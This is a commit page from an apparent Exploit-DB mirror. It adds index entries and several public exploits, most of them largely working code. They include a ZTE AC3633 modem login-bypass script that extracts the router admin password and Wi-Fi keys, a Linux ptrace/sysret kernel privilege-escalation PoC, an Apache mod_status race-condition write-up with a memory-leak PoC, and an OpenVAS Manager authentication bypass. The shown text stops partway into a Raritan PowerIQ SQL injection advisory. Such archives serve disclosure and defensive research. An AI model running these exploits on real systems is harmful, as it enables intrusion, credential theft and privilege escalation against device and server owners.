bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

Updated 07_23_2014

Browse source
This commit is contained in:
Offensive Security 2014-07-23 04:39:44 +00:00
parent b98d02460d
commit 2ea55e459e
14 changed files with 1989 additions and 1 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

15
files.csv
View file

@ -16855,7 +16855,7 @@ id,file,description,date,author,platform,type,port
19521,platforms/windows/remote/19521.txt,"MS IE 5.0/4.0.1 hhopen OLE Control Buffer Overflow Vulnerability",1999-09-27,"Shane Hird",windows,remote,0
19522,platforms/linux/remote/19522.txt,"Linux kernel 2.2 Predictable TCP Initial Sequence Number Vulnerability",1999-09-27,"Stealth and S. Krahmer",linux,remote,0
19523,platforms/linux/local/19523.txt,"python-wrapper Untrusted Search Path/Code Execution Vulnerability",2012-07-02,ShadowHatesYou,linux,local,0
19524,platforms/php/webapps/19524.txt,"WordPress Backup Plugin 2.0.1 Information Disclosure",2012-07-02,"Stephan Knauss",php,webapps,0
19524,platforms/php/webapps/19524.txt,"WordPress Backup Plugin 2.0.1 - Information Disclosure",2012-07-02,"Stephan Knauss",php,webapps,0
19525,platforms/windows/webapps/19525.txt,"IIS Short File/Folder Name Disclosure",2012-07-02,"Soroush Dalili",windows,webapps,0
19526,platforms/hardware/webapps/19526.rb,"WANGKONGBAO CNS-1000 UTM IPS-FW Directory Traversal",2012-07-02,"Dillon Beresford",hardware,webapps,0
19528,platforms/windows/local/19528.txt,"MS IE 4.1/5.0 Registration Wizard Buffer Overflow",1999-09-27,"Shane Hird",windows,local,0
@ -30481,6 +30481,7 @@ id,file,description,date,author,platform,type,port
33833,platforms/php/webapps/33833.txt,"Blog System 1.x Multiple Input Validation Vulnerabilities",2010-04-12,"cp77fk4r ",php,webapps,0
33834,platforms/php/webapps/33834.txt,"Vana CMS 'filename' Parameter Remote File Download Vulnerability",2010-04-13,"Pouya Daneshmand",php,webapps,0
33835,platforms/php/webapps/33835.txt,"AneCMS 1.0 Multiple Local File Include Vulnerabilities",2010-04-12,"AmnPardaz Security Research Team",php,webapps,0
33836,platforms/windows/shellcode/33836.txt,"Windows All Versions - Add Admin User Shellcode (194 bytes)",2014-06-22,"Giuseppe D'Amore",windows,shellcode,0
33838,platforms/windows/dos/33838.py,"Mocha W32 LPD 1.9 Remote Buffer Overflow Vulnerability",2010-04-15,mr_me,windows,dos,0
33839,platforms/multiple/remote/33839.txt,"Oracle E-Business Suite Financials 12 'jtfwcpnt.jsp' SQL Injection Vulnerability",2010-04-15,"Joxean Koret",multiple,remote,0
33840,platforms/asp/webapps/33840.txt,"Ziggurrat Farsi CMS 'bck' Parameter Directory Traversal Vulnerability",2010-04-15,"Pouya Daneshmand",asp,webapps,0
@ -30631,6 +30632,7 @@ id,file,description,date,author,platform,type,port
34007,platforms/php/webapps/34007.txt,"Dolibarr CMS 3.5.3 - Multiple Security Vulnerabilities",2014-07-08,"Deepak Rathore",php,webapps,0
34008,platforms/php/webapps/34008.txt,"Percha Multicategory Article Component 0.6 for Joomla! index.php controller Parameter Arbitrary File Access",2010-05-19,AntiSecurity,php,webapps,0
34009,platforms/windows/remote/34009.rb,"Yokogawa CS3000 BKFSim_vhfd.exe Buffer Overflow",2014-07-08,metasploit,windows,remote,20010
34010,platforms/win32/dos/34010.html,"Internet Explorer 9/10 - CFormElement Use-After-Free and Memory Corruption PoC (MS14-035)",2014-07-08,"Drozdova Liudmila",win32,dos,0
34011,platforms/php/webapps/34011.txt,"Shopzilla Affiliate Script PHP 'search.php' Cross Site Scripting Vulnerability",2010-05-19,"Andrea Bocchetti",php,webapps,0
34012,platforms/php/webapps/34012.txt,"Caucho Resin Professional 3.1.5 'resin-admin/digest.php' Multiple Cross Site Scripting Vulnerabilities",2010-05-19,xuanmumu,php,webapps,0
34013,platforms/windows/remote/34013.txt,"McAfee Email Gateway 6.7.1 'systemWebAdminConfig.do' Remote Security Bypass Vulnerability",2010-05-19,"Nahuel Grisolia",windows,remote,0
@ -30644,6 +30646,7 @@ id,file,description,date,author,platform,type,port
34023,platforms/php/webapps/34023.txt,"Lisk CMS 4.4 'id' Parameter Multiple Cross Site Scripting and SQL Injection Vulnerabilities",2010-05-20,"High-Tech Bridge SA",php,webapps,0
34024,platforms/php/webapps/34024.txt,"Triburom 'forum.php' Cross Site Scripting Vulnerability",2010-01-15,"ViRuSMaN ",php,webapps,0
34025,platforms/php/webapps/34025.txt,"C99.php Shell - Authentication Bypass",2014-07-10,Mandat0ry,php,webapps,0
34026,platforms/linux/remote/34026.py,"OpenVAS Manager 4.0 - Authentication Bypass Vulnerability PoC",2014-07-10,EccE,linux,remote,0
34027,platforms/solaris/dos/34027.txt,"Sun Solaris 10 Nested Directory Tree Local Denial of Service Vulnerability",2010-05-21,"Maksymilian Arciemowicz",solaris,dos,0
34028,platforms/solaris/dos/34028.txt,"Sun Solaris 10 'in.ftpd' Long Command Handling Security Vulnerability",2010-05-21,"Maksymilian Arciemowicz",solaris,dos,0
34029,platforms/php/webapps/34029.txt,"Specialized Data Systems Parent Connect 2010.04.11 Multiple SQL Injection Vulnerabilities",2010-05-21,epixoip,php,webapps,0
@ -30709,12 +30712,14 @@ id,file,description,date,author,platform,type,port
34100,platforms/php/webapps/34100.txt,"Omeka 2.2 - CSRF And Stored XSS Vulnerability",2014-07-17,LiquidWorm,php,webapps,80
34102,platforms/linux/dos/34102.py,"ACME micro_httpd - Denial of Service",2014-07-18,"Yuval tisf Nativ",linux,dos,80
34103,platforms/cgi/webapps/34103.txt,"Barracuda Networks Message Archiver 650 - Persistent XSS Vulnerability",2014-07-18,Vulnerability-Lab,cgi,webapps,3378
34105,platforms/php/webapps/34105.txt,"Wordpress Plugin Gallery Objects 0.4 - SQL Injection",2014-07-18,"Claudio Viviani",php,webapps,80
34106,platforms/php/webapps/34106.txt,"cPanel 11.25 Image Manager 'target' Parameter Local File Include Vulnerability",2010-06-07,"AnTi SeCuRe",php,webapps,0
34107,platforms/php/webapps/34107.txt,"boastMachine 3.1 'key' Parameter Cross Site Scripting Vulnerability",2010-06-07,"High-Tech Bridge SA",php,webapps,0
34108,platforms/java/webapps/34108.txt,"PRTG Traffic Grapher 6.2.1 'url' Parameter Cross Site Scripting Vulnerability",2009-01-08,"Patrick Webster",java,webapps,0
34109,platforms/php/webapps/34109.html,"log1 CMS 2.0 Session Handling Remote Security Bypass and Remote File Include Vulnerabilities",2010-06-03,"High-Tech Bridge SA",php,webapps,0
34110,platforms/php/webapps/34110.txt,"PG Auto Pro SQL Injection and Cross Site Scripting Vulnerabilities",2010-06-09,Sid3^effects,php,webapps,0
34111,platforms/multiple/webapps/34111.txt,"GREEZLE - Global Real Estate Agent Login Multiple SQL Injection Vulnerabilities",2010-06-09,"L0rd CrusAd3r",multiple,webapps,0
34112,platforms/windows/local/34112.txt,"Microsoft XP SP3 MQAC.sys - Arbitrary Write Privilege Escalation",2014-07-19,KoreLogic,windows,local,0
34113,platforms/php/webapps/34113.py,"SilverStripe CMS 2.4 File Renaming Security Bypass Vulnerability",2010-06-09,"John Leitch",php,webapps,0
34114,platforms/php/webapps/34114.txt,"Joomla! JReservation Component Cross Site Scripting Vulnerability",2010-06-09,Sid3^effects,php,webapps,0
34115,platforms/windows/remote/34115.txt,"McAfee Unified Threat Management Firewall 4.0.6 'page' Parameter Cross Site Scripting Vulnerability",2010-06-07,"Adam Baldwin",windows,remote,0
@ -30724,5 +30729,13 @@ id,file,description,date,author,platform,type,port
34119,platforms/php/webapps/34119.txt,"Bits Video Script 2.04/2.05 addvideo.php File Upload Arbitrary PHP Code Execution",2010-01-18,indoushka,php,webapps,0
34120,platforms/php/webapps/34120.txt,"Bits Video Script 2.04/2.05 register.php File Upload Arbitrary PHP Code Execution",2010-01-18,indoushka,php,webapps,0
34121,platforms/php/webapps/34121.txt,"Bits Video Script 2.04/2.05 'search.php' Cross Site Scripting Vulnerability",2010-01-18,indoushka,php,webapps,0
34124,platforms/php/webapps/34124.txt,"Wordpress WP BackupPlus - Database And Files Backup Download (0day)",2014-07-20,pSyCh0_3D,php,webapps,0
34126,platforms/windows/remote/34126.txt,"Microsoft Help and Support Center 'sysinfo/sysinfomain.htm' Cross Site Scripting Weakness",2010-06-10,"Tavis Ormandy",windows,remote,0
34127,platforms/php/webapps/34127.txt,"Arab Portal 2.2 'members.php' SQL Injection Vulnerability",2010-06-10,SwEET-DeViL,php,webapps,0
34128,platforms/hardware/webapps/34128.py,"MTS MBlaze Ultra Wi-Fi / ZTE AC3633 - Multiple Vulnerabilities",2014-07-21,"Ajin Abraham",hardware,webapps,80
34129,platforms/windows/dos/34129.txt,"World Of Warcraft 3.3.5a (macros-cache.txt) - Stack Overflow",2014-07-21,"Alireza Chegini",windows,dos,0
34130,platforms/linux/webapps/34130.rb,"Raritan PowerIQ 4.1.0 - SQL Injection Vulnerability",2014-07-21,"Brandon Perry",linux,webapps,80
34132,platforms/php/remote/34132.txt,"IBM GCM16/32 1.20.0.22575 - Multiple Vulnerabilities",2014-07-21,"Alejandro Alvarez Bravo",php,remote,443
34133,platforms/linux/dos/34133.txt,"Apache 2.4.7 mod_status Scoreboard Handling Race Condition",2014-07-21,"Marek Kroemeke",linux,dos,0
34134,platforms/lin_amd64/local/34134.c,"Linux Kernel ptrace/sysret - Local Privilege Escalation",2014-07-21,"Vitaly Nikolenko",lin_amd64,local,0
34135,platforms/windows/dos/34135.py,"DjVuLibre <= 3.5.25.3 - Out of Bounds Access Violation",2014-07-22,drone,windows,dos,0

Can't render this file because it is too large.

81
platforms/hardware/webapps/34128.py Executable file
View file

@ -0,0 +1,81 @@
#Author: Ajin Abraham - xboz
#http://opensecurity.in
#Product MTS MBlaze 3G Wi-Fi Modem
#System Version 107
#Manufacturer ZTE
#Model AC3633
import requests
import os
import urllib2
print "MTS MBlaze Ultra Wi-Fi / ZTE AC3633 Exploit"
print "Vulnerabilities"
print "Login Bypass | Router Credential Stealing | Wi-Fi Password Stealing | CSRF | Reset Password without old password and Session\n"
url='http://192.168.1.1'
def find_between( s, first, last ):
try:
start = s.index( first ) + len( first )
end = s.index( last, start )
return s[start:end]
except ValueError:
return ""
#Vulnerable Static Cookies
cookies = dict(iusername='logined')
#Login Bypass
login_url = url+'/en/index.asp'
print "\nAttempting Login :"+url
print '================='
try:
response=urllib2.urlopen(url,timeout=1)
except:
print "Cannot Reach : "+url
exit
r = requests.get(login_url, cookies=cookies)
print 'Status : ' + str(r.status_code)
if "3g.asp" in r.text:
print "Login Sucessfull!"
#Information Gathering
print "\nInformation"
print "========="
info_url=url+'/en/3g.asp'
i= requests.get(info_url, cookies=cookies)
ip=find_between(i.text,'"g3_ip" disabled="disabled" style="background:#ccc;" size="16" maxlength="15" value="','"></td>')
subnet =find_between(i.text,'"g3_mask" disabled="disabled" style="background:#ccc;" size="16" maxlength="15" value="','"></td>')
gateway=find_between(i.text,'"g3_gw" disabled="disabled" style="background:#ccc;" size="16" maxlength="15" value="','"></td>')
print "IP : " +ip
print "Subnet : "+subnet
print "Gateway : " +gateway
#Steal Login Password
print "\nStealing Router Login Credentials"
print "======================"
login_pwd_url=url+'/en/password.asp'
p = requests.get(login_pwd_url, cookies=cookies)
print 'Status : ' + str(p.status_code)
print 'Username : admin' #default
passwd=find_between(p.text,'id="sys_password" value="','"/>')
print 'Password : '+ passwd
print '\nExtracting WPA/WPA2 PSK Key'
print '================='
#Wi-Fi Password Extraction
wifi_pass_url=url+'/en/wifi_security.asp'
s = requests.get(wifi_pass_url, cookies=cookies)
print 'Status: ' + str(s.status_code)
wpa=find_between(s.text,"wpa_psk_key]').val('","');")
wep=find_between(s.text,"wep_key]').val('","');")
print "WPA/WPA2 PSK : " + wpa
print "WEP Key : " + wep
print "\nOther Vulnerabilities"
print "======================="
print "\n1.Cross Site Request Forgery in:\n\nhttp://192.168.1.1/en/dhcp_reservation.asp\nhttp://192.168.1.1/en/mac_filter.asp \nhttp://192.168.1.1/en/password.asp"
print "\n2.Password Reset without old password and Session"
print """
POST /goform/formSyWebCfg HTTP/1.1
Host: 192.168.1.1
Content-Type: application/x-www-form-urlencoded
Referer: http://192.168.1.1/en/password.asp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8,es;q=0.6,ms;q=0.4
Content-Length: 52
action=Apply&sys_cfg=changed&sys_password=mblazetestpassword
"""

125
platforms/lin_amd64/local/34134.c Executable file
View file

@ -0,0 +1,125 @@
/**
* CVE-2014-4699 ptrace/sysret PoC
* by Vitaly Nikolenko
* vnik@hashcrack.org
*
* > gcc -O2 poc_v0.c
*
* This code is kernel specific. On Ubuntu 12.04.0 LTS (3.2.0-23-generic), the
* following will trigger the #GP in sysret and overwrite the #PF handler so we
* can land to our NOP sled mapped at 0x80000000.
* However, once landed, the IDT will be trashed. We can either attempt to
* restore it (then escalate privileges and execute our shellcode) or find
* something else to overwrite that would transfer exec flow to our controlled
* user-space address. Since 3.10.something, IDT is read-only anyway. If you
* have any ideas, let me know.
*/
#include <stdio.h>
#include <stdint.h>
#include <assert.h>
#include <sys/ptrace.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <sys/syscall.h>
#include <sys/user.h>
#include <unistd.h>
#include <sys/mman.h>
#include <errno.h>
#define SIZE 0x10000000
typedef int __attribute__((regparm(3))) (*commit_creds_fn)(unsigned long cred);
typedef unsigned long __attribute__((regparm(3))) (*prepare_kernel_cred_fn)(unsigned long cred);
unsigned long __user_cs;
unsigned long __user_ss;
unsigned long __user_rflags;
void __attribute__((regparm(3))) payload() {
uint32_t *fixptr = (void*)0xffffffff81dd70e8;
// restore the #PF handler
*fixptr = -1;
//commit_creds_fn commit_creds = (commit_creds_fn)0xffffffff81091630;
//prepare_kernel_cred_fn prepare_kernel_cred = (prepare_kernel_cred_fn)0xffffffff810918e0;
//commit_creds(prepare_kernel_cred((uint64_t)NULL));
//__asm__ volatile ("swapgs\n\t"
// "...");
}
int main() {
struct user_regs_struct regs;
uint8_t *trampoline, *tmp;
int status;
struct {
uint16_t limit;
uint64_t addr;
} __attribute__((packed)) idt;
// MAP_POPULATE so we don't trigger extra #PF
trampoline = mmap(0x80000000, SIZE, 7|PROT_EXEC|PROT_READ|PROT_WRITE, 0x32|MAP_FIXED|MAP_POPULATE|MAP_GROWSDOWN, 0,0);
assert(trampoline == 0x80000000);
memset(trampoline, 0x90, SIZE);
tmp = trampoline;
tmp += SIZE-1024;
memcpy(tmp, &payload, 1024);
memcpy(tmp-13,"\x0f\x01\xf8\xe8\5\0\0\0\x0f\x01\xf8\x48\xcf", 13);
pid_t chld;
if ((chld = fork()) < 0) {
perror("fork");
exit(1);
}
if (chld == 0) {
if (ptrace(PTRACE_TRACEME, 0, 0, 0) != 0) {
perror("PTRACE_TRACEME");
exit(1);
}
raise(SIGSTOP);
fork();
return 0;
}
asm volatile("sidt %0" : "=m" (idt));
printf("IDT addr = 0x%lx\n", idt.addr);
waitpid(chld, &status, 0);
ptrace(PTRACE_SETOPTIONS, chld, 0, PTRACE_O_TRACEFORK);
ptrace(PTRACE_CONT, chld, 0, 0);
waitpid(chld, &status, 0);
ptrace(PTRACE_GETREGS, chld, NULL, &regs);
regs.rdi = 0x0000000000000000;
regs.rip = 0x8fffffffffffffff;
regs.rsp = idt.addr + 14*16 + 8 + 0xb0 - 0x78;
// attempt to restore the IDT
regs.rdi = 0x0000000000000000;
regs.rsi = 0x81658e000010cbd0;
regs.rdx = 0x00000000ffffffff;
regs.rcx = 0x81658e000010cba0;
regs.rax = 0x00000000ffffffff;
regs.r8 = 0x81658e010010cb00;
regs.r9 = 0x00000000ffffffff;
regs.r10 = 0x81668e0000106b10;
regs.r11 = 0x00000000ffffffff;
regs.rbx = 0x81668e0000106ac0;
regs.rbp = 0x00000000ffffffff;
regs.r12 = 0x81668e0000106ac0;
regs.r13 = 0x00000000ffffffff;
regs.r14 = 0x81668e0200106a90;
regs.r15 = 0x00000000ffffffff;
ptrace(PTRACE_SETREGS, chld, NULL, &regs);
ptrace(PTRACE_CONT, chld, 0, 0);
ptrace(PTRACE_DETACH, chld, 0, 0);
}

394
platforms/linux/dos/34133.txt Executable file
View file

@ -0,0 +1,394 @@
--[ 0. Sparse summary
Race condition between updating httpd's "scoreboard" and mod_status,
leading to several critical scenarios like heap buffer overflow with
user
supplied payload and leaking heap which can leak critical memory
containing
htaccess credentials, ssl certificates private keys and so on.
--[ 1. Prerequisites
Apache httpd compiled with MPM event or MPM worker.
The tested version was 2.4.7 compiled with:
./configure --enable-mods-shared=reallyall --with-included-apr
The tested mod_status configuration in httpd.conf was:
SetHandler server-status
ExtendedStatus On
--[ 2. Race Condition
Function ap_escape_logitem in server/util.c looks as follows:
1908AP_DECLARE(char *) ap_escape_logitem(apr_pool_t *p, const char
*str)
1909{
1910 char *ret;
1911 unsigned char *d;
1912 const unsigned char *s;
1913 apr_size_t length, escapes = 0;
1914
1915 if (!str) {
1916 return NULL;
1917 }
1918
1919 /* Compute how many characters need to be escaped */
1920 s = (const unsigned char *)str;
1921 for (; *s; ++s) {
1922 if (TEST_CHAR(*s, T_ESCAPE_LOGITEM)) {
1923 escapes++;
1924 }
1925 }
1926
1927 /* Compute the length of the input string, including NULL
*/
1928 length = s - (const unsigned char *)str + 1;
1929
1930 /* Fast path: nothing to escape */
1931 if (escapes == 0) {
1932 return apr_pmemdup(p, str, length);
1933 }
In the for-loop between 1921 and 1925 lines function is computing the
length of
supplied str (almost like strlen, but additionally it counts special
characters
which need to be escaped). As comment in 1927 value says, function
computes count
of bytes to copy. If there's nothing to escape function uses
apr_pmemdup to duplicate
the str. In our single-threaded mind everything looks good, but tricky
part starts
when we introduce multi-threading. Apache in MPM mode runs workers as
threads, let's
consider the following scenario:
1) ap_escape_logitem(pool, "") is called
2) for-loop in 1921 line immediately escapes, because *s is in
first loop run
3) malicious thread change memory under *s to another value
(something which is not )
4) apr_pmemdup copies that change value to new string and returns
it
Output from the ap_escape_logitem is considered to be a string, if
scenario above would occur,
then returned string would not be zeroed at the end, which may be
harmful. The mod_status
code looks as follows:
833 ap_rprintf(r, "%s%s"
834 "%snn",
835 ap_escape_html(r->pool,
836
ws_record->client),
837 ap_escape_html(r->pool,
838
ws_record->vhost),
839 ap_escape_html(r->pool,
840
ap_escape_logitem(r->pool,
841
ws_record->request)));
The relevant call to ap_escape_html() is at line 839 after the
evaluation of ap_escape_logitem().
The first argument passed to the ap_escape_logitem() is in fact an apr
pool associated with
the HTTP request and defined in the request_rec structure.
This code is a part of a larger for-loop where code is iterating over
worker_score structs which is
defined as follows:
90struct worker_score {
91#if APR_HAS_THREADS
92 apr_os_thread_t tid;
93#endif
94 int thread_num;
95 /* With some MPMs (e.g., worker), a worker_score can
represent
96 * a thread in a terminating process which is no longer
97 * represented by the corresponding process_score. These
MPMs
98 * should set pid and generation fields in the worker_score.
99 */
100 pid_t pid;
101 ap_generation_t generation;
102 unsigned char status;
103 unsigned short conn_count;
104 apr_off_t conn_bytes;
105 unsigned long access_count;
106 apr_off_t bytes_served;
107 unsigned long my_access_count;
108 apr_off_t my_bytes_served;
109 apr_time_t start_time;
110 apr_time_t stop_time;
111 apr_time_t last_used;
112#ifdef HAVE_TIMES
113 struct tms times;
114#endif
115 char client[40]; /* Keep 'em small... but large
enough to hold an IPv6 address */
116 char request[64]; /* We just want an idea... */
117 char vhost[32]; /* What virtual host is being
accessed? */
118};
The 'request' field in a worker_score structure is particularly
interesting - this field can be changed inside
the copy_request function, which is called by the
update_child_status_internal. This change may occur when the
mod_status is iterating over the workers at the same time the
ap_escape_logitem is called within a different
thread, leading to a race condition. We can trigger this exact
scenario in order to return a string without a
trailing . This can be achived by running two clients, one triggering
the mod_status handler and second
sending random requests to the web server. Let's consider the
following example:
1) the mod_status iterates over workers invoking
update_child_status_internal()
2) at some point for one worker mod_status calls
ap_escape_logitem(pool, ws_record->request)
3) let's asume that ws_record->request at the beginning is ""
literally at the first byte.
4) inside the ap_escape_logitem function the length of the
ws_record->request is computed, which is 1
(an empty string consisting of )
5) another thread modifies ws_record->request (in fact it's called
ws->request in update_child_status_internal
function but it's exactly the same location in memory) and puts
there i.e. "GET / HTTP/1.0"
6) the ap_pmemdup(pool, str, 1) in ap_escape_logitem copies the
first one byte from "GET / HTTP/1.0" - "G" in
that case and returns it. The ap_pmemdup looks as follows:
112APR_DECLARE(void *) apr_pmemdup(apr_pool_t *a, const void
*m, apr_size_t n)
113{
114 void *res;
115
116 if (m == NULL)
117 return NULL;
118 res = apr_palloc(a, n);
119 memcpy(res, m, n);
120 return res;
It allocates memory using apr_palloc function which returns
"ditry" memory (note that apr_pcalloc overwrite
allocated memory with NULs).
So it's non-deterministic what's after the copied "G" byte.
There might be or might be not. For now let's
assume that the memory allocated by apr_palloc was dirty
(containing random bytes).
7) ap_escape_logitem returns "G....." .junk. ""
The value from the example above is then pushed to the ap_escape_html2
function which is also declared in util.c:
1860AP_DECLARE(char *) ap_escape_html2(apr_pool_t *p, const char
*s, int toasc)
1861{
1862 int i, j;
1863 char *x;
1864
1865 /* first, count the number of extra characters */
1866 for (i = 0, j = 0; s[i] != ''; i++)
1867 if (s[i] == '')
1868 j += 3;
1869 else if (s[i] == '&')
1870 j += 4;
1871 else if (s[i] == '"')
1872 j += 5;
1873 else if (toasc && !apr_isascii(s[i]))
1874 j += 5;
1875
1876 if (j == 0)
1877 return apr_pstrmemdup(p, s, i);
1878
1879 x = apr_palloc(p, i + j + 1);
1880 for (i = 0, j = 0; s[i] != ''; i++, j++)
1881 if (s[i] == '') {
1886 memcpy(&x[j], ">", 4);
1887 j += 3;
1888 }
1889 else if (s[i] == '&') {
1890 memcpy(&x[j], "&", 5);
1891 j += 4;
1892 }
1893 else if (s[i] == '"') {
1894 memcpy(&x[j], """, 6);
1895 j += 5;
1896 }
1897 else if (toasc && !apr_isascii(s[i])) {
1898 char *esc = apr_psprintf(p, "&#%3.3d;", (unsigned
char)s[i]);
1899 memcpy(&x[j], esc, 6);
1900 j += 5;
1901 }
1902 else
1903 x[j] = s[i];
1904
1905 x[j] = '';
1906 return x;
1907}
If the string from the example above would be passed to this function
we should get the following code-flow:
1) in the for-loop started in line 1866 we count the length of
escaped string
2) because 's' string contains junk (due to only one byte being
allocated by the apr_palloc function),
it may contain '>' character. Let's assume that this is our
case
3) after for-loop in 1866 line 'j' is greater than 0 (at least one
s[i] equals '>' as assumed above
4) in the 1879 line memory for escaped 'd' string is allocated
5) for-loop started in line 1880 copies string 's' to the escaped
'd' string BUT apr_palloc has allocated
only one byte for 's'. Thus, for each i > 0 the loop reads
random memory and copies that value
to 'd' string. At this point it's possible to trigger an
information leak vulnerability (see section 5).
However the 's' string may overlap with 'd' i.e.:
's' is allocated under 0 with contents s = "AAAAAAAA>"
'd' is allocated under 8 then s[8] = d[0].
If that would be the case, then for-loop would run forever (s[i] never
would be since it was overwritten in the loop
by non-zero). Forever... until it hits an unmapped memory or read only
area.
Part of the scoreboard.c code which may overwrite the
ws_record->request was discovered using a tsan:
#1 ap_escape_logitem ??:0 (exe+0x0000000411f2)
#2 status_handler
/home/akat-1/src/httpd-2.4.7/modules/generators/mod_status.c:839
(mod_status.so+0x0000000044b0)
#3 ap_run_handler ??:0 (exe+0x000000084d98)
#4 ap_invoke_handler ??:0 (exe+0x00000008606e)
#5 ap_process_async_request ??:0 (exe+0x0000000b7ed9)
#6 ap_process_http_async_connection http_core.c:0
(exe+0x0000000b143e)
#7 ap_process_http_connection http_core.c:0 (exe+0x0000000b177f)
#8 ap_run_process_connection ??:0 (exe+0x00000009d156)
#9 process_socket event.c:0 (exe+0x0000000cc65e)
#10 worker_thread event.c:0 (exe+0x0000000d0945)
#11 dummy_worker thread.c:0 (libapr-1.so.0+0x00000004bb57)
#12 :0 (libtsan.so.0+0x00000001b279)
Previous write of size 1 at 0x7feff2b862b8 by thread T2:
#0 update_child_status_internal scoreboard.c:0
(exe+0x00000004d4c6)
#1 ap_update_child_status_from_conn ??:0 (exe+0x00000004d693)
#2 ap_process_http_async_connection http_core.c:0
(exe+0x0000000b139a)
#3 ap_process_http_connection http_core.c:0 (exe+0x0000000b177f)
#4 ap_run_process_connection ??:0 (exe+0x00000009d156)
#5 process_socket event.c:0 (exe+0x0000000cc65e)
#6 worker_thread event.c:0 (exe+0x0000000d0945)
#7 dummy_worker thread.c:0 (libapr-1.so.0+0x00000004bb57)
#8 :0 (libtsan.so.0+0x00000001b279)
--[ 3. Consequences
Race condition described in section 2, may lead to:
- information leak in case when the string returned by
ap_escape_logitem is not at the end,
junk after copied bytes may be valuable
- overwriting heap with a user supplied value which may imply code
execution
--[ 4. Exploitation
In order to exploit the heap overflow bug it's necessary to get
control over:
1) triggering the race-condition bug
2) allocating 's' and 'd' strings in the ap_escape_html2 to overlap
3) part of 's' which doesn't overlap with 'd' (this string is copied
over and over again)
4) overwriting the heap in order to get total control over the cpu or
at least modify the
apache's handler code flow for our benefits
--[ 5. Information Disclosure Proof of Concept
-- cut
#! /usr/bin/env python
import httplib
import sys
import threading
import subprocess
import random
def send_request(method, url):
try:
c = httplib.HTTPConnection('127.0.0.1', 80)
c.request(method,url);
if "foo" in url:
print c.getresponse().read()
c.close()
except Exception, e:
print e
pass
def mod_status_thread():
while True:
send_request("GET", "/foo?notables")
def requests():
evil = ''.join('A' for i in range(random.randint(0, 1024)))
while True:
send_request(evil, evil)
threading.Thread(target=mod_status_thread).start()
threading.Thread(target=requests).start()
-- cut
Below are the information leak samples gathered by running the poc
against the
testing Apache instance. Leaks include i.e. HTTP headers, htaccess
content,
httpd.conf content etc. On a live systems with a higher traffic
samples should
be way more interesting.
$ ./poc.py | grep "" |grep -v AAAA | grep -v "{}"| grep -v notables
127.0.0.1 {A} []
127.0.0.1 {A.01 cu0 cs0
127.0.0.1 {A27.0.0.1} []
127.0.0.1 {A|0|10 [Dead] u.01 s.01 cu0 cs0
127.0.0.1 {A
Û []
127.0.0.1 {A HTTP/1.1} []
127.0.0.1 {Ab><br />
127.0.0.1 {AAA}</i> <b>[127.0.1.1:19666]</b><br
/>
127.0.0.1 {A0.1.1:19666]</b><br />
127.0.0.1 {A§} []
127.0.0.1 {A cs0
127.0.0.1 {Adentity
127.0.0.1 {A HTTP/1.1} []
127.0.0.1 {Ape: text/html; charset=ISO-8859-1
127.0.0.1 {Ahome/IjonTichy/httpd-2.4.7-vanilla/htdocs/} []
127.0.0.1 {Aÿÿÿÿÿÿÿ} []
127.0.0.1 {Aanilla/htdocs/foo} []
127.0.0.1 {A0n/httpd-2.4.7-vanilla/htdocs/foo/} []
127.0.0.1 {A......................................... } []
127.0.0.1 {A-2014 16:23:30 CEST} []
127.0.0.1 {Acontent of htaccess
127.0.0.1 {Aver: Apache/2.4.7 (Unix)
127.0.0.1 {Aroxy:balancer://mycluster} []
We hope you enjoyed it.
Regards,
Marek Kroemeke, AKAT-1 and 22733db72ab3ed94b5f8a1ffcde850251fe6f466

75
platforms/linux/remote/34026.py Executable file
View file

@ -0,0 +1,75 @@
#!/usr/bin/python
# Exploit Title: OpenVAS Manager 4.0 Authentication Bypass Vulnerability PoC
# Date: 09/07/2014
# Exploit Author: EccE
# Vendor Homepage: http://www.openvas.org/
# Software Link: http://wald.intevation.org/frs/?group_id=29
# Version: OpenVAS Manager 4.0
# Tested on: Debian GNU/Linux testing (jessie)
# CVE : CVE-2013-6765
"""
Small list of working commands
get_agents
get_configs
get_alerts
get_filters
get_lsc_credentials
get_notes
get_nvts
get_targets
get_users
get_schedules
More commands (~70 commands) can be found directly in the omc.c file. Not all of them are working though.
As designed in OMP protocol, commands must be sent this way : <COMMAND/>
"""
import socket, ssl
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# Require a certificate from the server. We used a self-signed certificate
# so here cacerts.pem must be the server certificate itself.
ssl_sock = ssl.wrap_socket(s,
ca_certs="/var/lib/openvas/CA/cacert.pem",
cert_reqs=ssl.CERT_REQUIRED)
# OpenVAS Manager listen by default on localhost tcp/9390
ssl_sock.connect(('localhost', 9390))
print "#################################################################"
print "# Proof of Concept - OpenVAS Manager 4.0 Authentication Bypass #"
print "#################################################################"
print "\n"
print "--> Retrieving version...(exploiting the bug !)\n"
ssl_sock.write("<get_version/>")
data = ssl_sock.read()
print data
print "\n"
print "--> Retrieving slaves...\n"
ssl_sock.write("<get_slaves/>")
tasks = ssl_sock.read()
print tasks
print "\n"
"""
print "--> Creating note...\n"
ssl_sock.write("<create_note/>")
note = ssl_sock.read()
print note
print "--> Retrieving users list...\n"
ssl_sock.write("<get_users/>")
users_list = ssl_sock.read()
print users_list
"""
ssl_sock.close()

572
platforms/linux/webapps/34130.rb Executable file
View file

@ -0,0 +1,572 @@
=begin
Raritan PowerIQ suffers from an unauthenticated SQL injection vulnerability
within an endpoint used during initial configuration of the licensing for
the product. This endpoint is still available after the appliance has been
fully configured.
POST /license/records HTTP/1.1
Host: 192.168.1.11
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:26.0)
Gecko/20100101 Firefox/26.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: https://192.168.1.11/license
Content-Length: 15
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
sort=id&dir=ASC
Both the 'sort' and 'dir' parameters are vulnerable.
sqlmap identified the following injection points with a total of 1173
HTTP(s) requests:
---
Place: POST
Parameter: sort
Type: boolean-based blind
Title: Generic boolean-based blind - GROUP BY and ORDER BY clauses
